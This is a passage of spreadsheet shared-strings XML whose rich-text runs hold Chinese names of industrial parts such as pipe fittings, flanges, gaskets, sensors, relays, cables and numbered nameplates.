      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>普通</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>90</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度弯管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰的弯管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>普通</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>90</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度弯接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三通</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹三通</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外螺纹支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带槽支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹支管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏斗</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>漏斗锥管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切口圆法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封锥</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>矩形法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气圆垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊圆垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>矩形垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>纤维垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>椭圆形边垫片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>正方形截面密封环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杯形垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管螺纹接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通公</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>母螺纹转接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通公</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公螺纹转接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通母</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>母螺纹转接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套接头螺母</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管子衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>快速接头部件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>波纹管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰的喷嘴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹喷嘴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>孔塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰的孔塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膨胀衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直液体温度计</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>901</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>902</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>903</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>904</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>905</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>906</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>907</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>908</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>909</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>910</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>912</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套铭牌</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>零件存储箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电脑接口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保险丝，外壳</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附件接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布线管盖子</t>
    </r>
  </si>
  <si>
    <r>
      <t>PVC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阶梯形线盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线盒总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白色灯罩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>红色灯罩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绿色灯罩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动调压装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>镍铬传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>复合温度计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位移传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位置传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液位传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向振动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扁平电缆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口电缆数据</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电线结</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>行带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绕性电缆槽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柜</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶减震器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保险丝端扭</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电桥</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试插头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分开</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>闭锁继电器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>跟踪继电器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速继电器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>继电器标签</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信号隔离器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>母插头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公插头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插脚编号</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弯触点</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插头垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
